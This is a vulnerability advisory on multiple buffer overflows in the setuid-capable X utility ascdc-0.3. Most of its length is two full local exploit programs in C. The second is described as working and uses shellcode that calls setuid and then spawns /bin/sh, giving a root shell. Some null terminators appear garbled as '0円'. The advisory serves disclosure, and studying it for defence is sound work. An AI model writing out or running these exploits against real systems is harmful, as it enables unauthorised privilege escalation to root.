
Ascdc-0.3 multiple buffer overflows, possible root compromise
Vulnerability
 ascdc
Affected
 ascdc-0.3
Description
 The following is based on WSIR-01/02-06, discovered by Christer Öberg
 (Wkit Security). Use this bad boy to swap CDs graphically under
 X. There are multiple buffer overflows in ascdc that can be
 exploited to gain root if it is installed setuid root. It is NOT
 installed setuid root by default, but as the README says, "If you
 intend to use the automounting feature, you must either run ascdc
 as root, or setuid it". The exposure is therefore limited to local
 users on systems where that README advice was followed and the
 binary was made setuid root. Christer used the -d option in the
 exploit, but overflows also exist in the -m and -c switches.
 Exploit:
 /*
  * Payload bytes for the proof of concept. The opcode bytes are followed by
  * a plain-text message rather than a program path; this looks like a
  * demonstration payload that prints the message and exits
  * (NOTE(review): inferred from the bytes, confirm by disassembly).
  */
 char shellcode[]="\xeb\x15\x59\x31\xc0\x31\xdb\x31\xd2\xb0"
 "\x04\xb3\x01\xb2\x50\xcd\x80\x31\xc0\xb0"
 "\x01\xcd\x80\xe8\xe6\xff\xff\xff"
 "Would you like to play a game? y\x0aStrange, the only winning
 move is not to play.\x0a";
 /* Size in bytes of the over-long option value built in main(). */
 #define bsize 600
 /*
  * Returns the current stack pointer (x86, GCC-style inline asm).
  * There is no return statement: the asm copies %esp into %eax and the
  * code relies on %eax being taken as the return value. main() uses the
  * result as its guess for the address written into the buffer.
  */
 unsigned long get_sp(void) {
 __asm__("movl %esp,%eax");
 }
 /*
  * Builds a 600-byte string and starts ascdc with it as the value of -d.
  * The value is far longer than any sensible option argument; presumably
  * ascdc copies it into a fixed-size buffer without a length check (the
  * ascdc source is not shown on this page). The result only matters for
  * privilege when /usr/X11R6/bin/ascdc is setuid root.
  */
 main(int argc, char *argv[]) {
 char *buff, *ptr;
 long *addr_ptr, addr;
 int i;
 /* the malloc result is not checked */
 buff = malloc(bsize);
 /* this process's stack pointer, used as the guessed return address */
 addr = get_sp();
 ptr = buff;
 addr_ptr = (long *) ptr;
 /* fill the whole buffer with that address; the i+=4 step assumes a 4-byte long */
 for (i = 0; i < bsize; i+=4)
 *(addr_ptr++) = addr;
 /* overwrite the first half with 0x90 bytes (x86 NOP) */
 for (i = 0; i < 600/2; i++)
 buff[i] = 0x90;
 /* copy the payload so that it is centred on the midpoint of the buffer */
 ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
 for (i = 0; i < strlen(shellcode); i++)
 *(ptr++) = shellcode[i];
 /* set the final byte of the buffer */
 buff[bsize - 1] = '0円';
 /* replace this process with ascdc, passing the buffer as the -d value */
 execlp("/usr/X11R6/bin/ascdc","ascdc","-d",buff,0);
 }
 'The Itch' sent a working version of the exploit for ascdc-0.3, this
 time using the -c switch:
 /* /usr/X11R6/bin/ascdc local exploit.
 * (version: ascdc-0.3-2-i386)
 *
 * Vulnerability found by Christer Öberg, Wkit Security AB
 *
 * - The Itch / BsE
 * - http://bse.die.ms
 * - irc.axenet.org
 */
 
 #include <stdio.h>
 #include <stdlib.h>
 
 /* Size of the environment buffer that holds the NOP padding and the payload. */
 #define DEFAULT_EGG_SIZE 2048
 /* x86 no-op opcode, used as padding in front of the payload. */
 #define NOP 0x90
 
 /* adjust if needed, this should be sufficient */
 /* Default size of the over-long -c value; argv[1] overrides it in main(). */
 #define DEFAULT_BUFFER_SIZE 600
 
 /*
  * Returns the current stack pointer (x86, GCC-style inline asm).
  * There is no return statement: the asm copies %esp into %eax and the
  * code relies on %eax being taken as the return value. main() prints the
  * result and uses it as the guessed return address.
  */
 unsigned long get_sp(void)
 {
 __asm__("movl %esp, %eax");
 }
 
 /*
  * Payload. It ends with the literal "/bin/sh" and loads syscall numbers
  * 0x17 and 0x0b before int 0x80 (\xb0\x17\xcd\x80 and \xb0\x0b ... \xcd\x80),
  * which on Linux/x86 would be setuid and execve, i.e. a shell running with
  * the privileges of the overflowed process (NOTE(review): read off the
  * bytes, confirm by disassembly). The "/bin/sh" tail and the long 0x90 run
  * built in main() are the recognisable parts for anyone writing a
  * signature for this sample.
  */
 char shellcode[] =
 "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
 "\x80\xe8\xdc\xff\xff\xff/bin/sh";
 
 /*
  * Local exploit for the ascdc -c overflow.
  * Two buffers are placed in the environment: EGG (0x90 padding followed
  * by the payload) and RET (the guessed address repeated). ascdc is then
  * started through the shell with $RET as the -c value, so the over-long
  * input reaches ascdc as an ordinary option argument.
  * argv[1], if given, replaces the default RET size; it goes through
  * atoi() with no validation.
  * Returns 0; exits with status 1 if either allocation fails.
  */
 int main(int argc, char *argv[])
 {
 char *buff;
 char *egg;
 char *ptr;
 long *addr_ptr;
 long addr;
 int bsize = DEFAULT_BUFFER_SIZE;
 int eggsize = DEFAULT_EGG_SIZE;
 int i;
 
 /* optional override of the RET buffer size */
	 if(argc> 1) { bsize = atoi(argv[1]); }
 
	 if(!(buff = malloc(bsize)))
	 {
		 printf("unable to allocate memory for %d bytes\n", bsize);
		 exit(1);
	 }
 
	 if(!(egg = malloc(eggsize)))
	 {
	 	 printf("unable to allocate memory for %d bytes\n", eggsize);
 		 exit(1);
	 }
 
 /* this process's stack pointer, used as the guessed return address */
 addr = get_sp();
 
	 printf("/usr/X11R6/bin/ascdc local exploit.\n");
	 printf("Coded by The Itch / BsE\n\n");
 printf("Using return address: 0x%x\n", addr);
 printf("Using buffersize : %d\n", bsize);
 
 /* fill buff with the guessed address; the i+=4 step assumes a 4-byte long */
 ptr = buff;
 addr_ptr = (long *) ptr;
 for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = addr; }
 
 /* egg: NOP padding first, then the payload bytes at the end */
 ptr = egg;
 for(i = 0; i < eggsize - strlen(shellcode) -1; i++)
	 {
		 *(ptr++) = NOP;
	 }
 
	 for(i = 0; i < strlen(shellcode); i++)
	 {
		 *(ptr++) = shellcode[i];
	 }
 
 /* set the final byte of each buffer */
 buff[bsize - 1] = '0円';
 egg[eggsize - 1] = '0円';
 /* the first four bytes of each buffer are overwritten with the variable name */
 memcpy(egg, "EGG=", 4);
 putenv(egg);
 memcpy(buff, "RET=", 4);
 putenv(buff);
 
 /* system() runs this through the shell, which expands $RET unquoted */
 system("/usr/X11R6/bin/ascdc -c $RET");
 
 return 0;
 }
Solution
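 No information available. As the description notes, the root compromise
 depends on ascdc being installed setuid root, so leaving the binary
 without the setuid bit (the default) removes the privilege-escalation
 path until the overflows themselves are fixed.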
